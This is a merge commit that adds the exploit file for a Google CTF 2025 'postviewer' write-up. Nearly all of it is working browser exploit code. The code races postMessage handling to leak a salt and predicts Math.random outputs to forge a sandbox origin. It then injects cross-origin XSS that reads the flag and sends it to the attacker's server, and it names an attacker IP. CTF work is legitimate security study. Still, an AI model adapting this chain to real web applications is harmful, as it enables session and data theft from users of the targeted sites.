Merge pull request #15 from b1tsOnTiLT/main

Add postviewer writeup

Author: abizer94

content/writeups/GoogleCTF2025/postviewer/exploit-chrome.html

@@ -0,0 +1,249 @@
+<script src="http://localhost:1338/static/safe-frame.js"></script>
+<script src="http://localhost:1338/static/util.js"></script>
+
+<!-- http://34.44.166.247/exploit-eolldodkgm9 -->
+<script>
+
+  const RELOAD_TIME = 150;
+  const SMALL_DELAY = 2;
+  const MSG_DELAY = 80;
+  const MSG_INTERVAL = 3000;
+  const FIRST_STEP = 1e4; // try 1e5 if doesn't give flag after multiple tries
+  const SECOND_STEP = 8e3; // try 9e3 if doesn't give flag after multiple tries
+
+  const sleep = d => new Promise(r=>setTimeout(r,d));
+
+  const { promise: leakedSaltPromise, resolve: leakedSaltResolver } = Promise.withResolvers();
+  const { promise: xssReadyPromise, resolve: xssReadyResolver } = Promise.withResolvers();
+  const { promise: blankReadyPromise, resolve: blankReadyResolver } = Promise.withResolvers();
+
+  let saltLeaked = false;
+
+  function reset(){
+    appWin.close();
+    setTimeout(()=>{
+      location.reload();
+    },1000);
+  }
+
+  const splitToChunks = (arr, size) =>
+    Array.from({ length: Math.ceil(arr.length / size) }, (v, i) =>
+    arr.slice(i * size, i * size + size)
+  );
+
+  async function predictValidFlag(salt){
+
+    try{
+      const predictions = await fetch('/predict/'+salt).then(e=>e.json());
+      if(predictions.length == 0){
+        throw /failed to crack/;
+      }
+      const chunks = splitToChunks(predictions, 5);
+      let found = false;
+      let foundIdx = 0;
+      for(let i = 0; i < chunks.length; i++){
+        const newSalt = chunks[i].map(e=>e.toString(36).slice(2)).join('');
+        if(!found) {
+          if(newSalt == salt){
+            found = true;
+            foundIndex = i;
+            window.predictions = [salt];
+          }
+          continue;
+        }
+        window.predictions.push(newSalt);
+        if(newSalt.length == 49 || newSalt.length == 50){
+          return [newSalt, i-foundIndex-1];
+        }
+      }
+      throw /no salt found/;
+    }catch(e){
+      console.error(e);
+      reset();
+    }
+  }
+
+  async function generateBlob(content, nameLength=50){
+    for(let i=0; i<1e4; i++){
+      const newContent = content + Math.random();
+      const blob = new Blob([newContent], {type: 'text/html'})
+      const file = new File([blob], 'test' + 'a'.repeat(nameLength - 4), {type: 'text/html'});
+      const id = await generateFileId(file);
+      if(id.includes('test')){
+        return blob
+      }
+    }
+    throw new Error("didn't find content");
+  }
+
+  onmessage = e => {
+    if(e.data.salt){
+      saltLeaked = true;
+      clearInterval(window.interval);
+      leakedSaltResolver(new TextDecoder('utf-8').decode(e.data.salt));
+    }
+    if(e.data == 'ready'){
+      xssReadyResolver();
+    }
+
+    if(e.data == 'blankReady'){
+      blankReadyResolver();
+    }
+
+    if(e.data == 'loaded'){
+      setTimeout(()=>{
+        if(!saltLeaked){
+          reset();
+        }
+      }, 3_000);
+    }
+  }
+
+
+  onload = async () => {
+    window.appWin = open(`http://localhost:1338/#`, 'exploit', 'width=500,height=500');
+
+    await new Promise(resolve=>{
+      const interval = setInterval(()=>{
+        try{
+          appWin.location.href;
+        }catch(e){
+          resolve();
+          clearInterval(interval);
+        }
+      });
+    });
+    await sleep(500);
+
+    const blobName = await generateBlob(
+      `<script>window.name = "scf"; location = "${origin}/log/blob";<\/script>`);
+
+
+    const blobSalt = await generateBlob(`
+      <script>onload = () => {
+          console.log('[blob] loaded', Date.now());
+          opener.postMessage('loaded', '*');
+        }
+        onmessage = (e) => {opener.postMessage(e.data, '*')};
+      <\/script>
+      leak salt
+    `);
+
+
+    const transmitXss = await generateBlob(`
+        XSS<script>opener[0].eval(\`
+          top.postMessage("ready", "*");
+          flagWin = open('', 'scf');
+          var interval = setInterval(()=>{
+            const flag = flagWin.document.body.innerText;
+            if(flag.includes("CTF{")){
+              clearInterval(interval);
+              location="${window.origin}/flag/" + flag;
+            }
+          }, 1000);
+        \`)<\/script>
+    `, 49);
+
+    const infiniteLoadBlob = URL.createObjectURL(new Blob([`
+    Reload
+    <script>
+      itself = false;
+      int = setTimeout(()=>{
+        itself = true;
+        location = URL.createObjectURL(new Blob([document.documentElement.innerHTML], {type: 'text/html'}))
+      }, ${RELOAD_TIME});
+      onbeforeunload = () => {
+        if(!itself){
+         console.log('before', Date.now());
+          opener.postMessage('loaded', '*');
+        }
+        clearInterval(int);
+      }
+    <\/script>
+    `], {type: 'text/html'}));
+
+
+    const blankBlob = await generateBlob(`blank<script>onload = () => opener.postMessage('blankReady', '*');<\/script>`);
+
+
+    const shareFile = function(blob, name, cached=false){
+      appWin.postMessage({
+        type:'share',
+        files:[{
+          blob,
+          cached,
+          name
+        }]
+      }, '*');
+    }
+
+
+    shareFile(blobName, 'setname' + 'a'.repeat(50), true);
+    await sleep(1000);
+
+    window.innerWin = open('', 'scf');
+    window.innerWin.location = infiniteLoadBlob;
+    await sleep(1000);
+
+    shareFile(blobSalt, 'blobsalt' + 'a'.repeat(50));
+    fetch('/log/refresh');
+
+    await sleep(SMALL_DELAY);
+    // const buff = new Uint8Array(5e7);
+    // appWin.postMessage({ slow: 1e9  }, '*')
+    appWin.postMessage({ type:'share', files:{length: FIRST_STEP}  }, '*')
+    console.log('[exp] slow down', Date.now());
+    window.interval = setInterval(() => {
+      // delay around 900ms
+      // const buff = new Uint8Array(3e7);
+      appWin.postMessage({ type:'share', files:{length: SECOND_STEP}  }, '*')
+    }, MSG_DELAY);
+
+
+    setTimeout(()=>{
+      clearInterval(window.interval);
+    }, MSG_INTERVAL)
+    // In Chrome I only managed to win the race with reloading an innerIframe
+    // I suspect it's because it will trigger additional onload() event
+    // setTimeout(() => {console.log('innerWin', Date.now(), innerWin.origin); innerWin.location = "/reload/200" }, 80);
+
+    const salt = await leakedSaltPromise;
+   console.log('[exp] salt', salt);
+
+    const [predictedFlagSalt, afterN] = await predictValidFlag(salt);
+   console.log('[exp] predicted', predictedFlagSalt, afterN);
+   fetch('/log/predict:' + predictedFlagSalt + ':' + afterN);
+    const hash = await calculateHash('google-ctf', predictedFlagSalt, 'http://localhost:1338');
+    const url = new URL(
+      `https://${hash}-h748636364.scf.usercontent.goog/google-ctf/shim.html?cache=1`
+    );
+
+    let firstPred = true;
+    for(let i = 0; i < afterN; i++){
+      shareFile(blankBlob, 'blank' + 'a'.repeat(50));
+      await sleep(10);
+      firstPred = false;
+    }
+
+    const iframe = document.createElement('iframe');
+    iframe.src = url;
+    document.body.appendChild(iframe);
+
+    await new Promise(r=>iframe.onload=r);
+
+    if(!firstPred){
+      await blankReadyPromise;
+      console.log('[exp] blank ready');
+    }
+
+    shareFile(transmitXss, predictedFlagSalt, true);
+
+    await xssReadyPromise;
+    await sleep(1500);
+    appWin.location = 'http://localhost:1338/#'
+    await sleep(100);
+    appWin.location = 'http://localhost:1338/#0'
+
+  }
+
+</script>